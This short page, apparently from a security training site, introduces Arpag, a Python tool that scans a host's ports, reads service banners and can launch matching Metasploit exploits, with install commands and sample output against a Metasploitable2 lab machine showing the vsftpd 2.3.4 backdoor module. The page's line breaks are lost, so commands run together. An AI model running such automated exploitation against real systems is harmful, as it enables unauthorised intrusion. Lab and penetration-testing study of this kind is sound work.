Ready to Start Your Career?

By: anilbaranyelken
April 19, 2018
Arpag - Python Automatic Exploit Tool

By: anilbaranyelken
April 19, 2018

Installation:
git clone https://github.com/anilbaranyelken/arpag.gitcd arpagpip install -r requestsUsage:
arpag.py [-h] IP_address Exploit_status Port_baslangic Port_bitisExample Usage 1:python arpag.py 192.168.1.24 False 20 30192.168.1.24(Metasploitable2) , The IP address is scanned for the port and banner information is received. The port range is 20-30. Exploit_status is False, no exploit will be done.Output:
python arpag.py 192.168.1.24 False 20 30[+]Port: 21[+]Servis: : 220 (vsFTPd 2.3.4)[+]Port: 22[+]Servis: : SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1[+]Port: 23[+]Servis: : ����� ��#��'[+]Port: 25[+]Servis: : 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)[+]Exploit kontrolleri başlıyor...[+]Serviste exploit kontrolü başlıyor: 220 (vsFTPd 2.3.4)[+]Metasploit exploit: exploit/unix/ftp/vsftpd_234_backdoorExample Usage 2:
python arpag.py 192.168.1.24 True 1 80[+]Port: 21[+]Servis: : 220 (vsFTPd 2.3.4)[+]Port: 22[+]Servis: : SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1[+]Port: 23[+]Servis: : ����� ��#��'[+]Port: 25[+]Servis: : 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)[+]Exploit kontrolleri başlıyor...[+]Serviste exploit kontrolü başlıyor: 220 (vsFTPd 2.3.4)[+]Metasploit exploit: exploit/unix/ftp/vsftpd_234_backdoor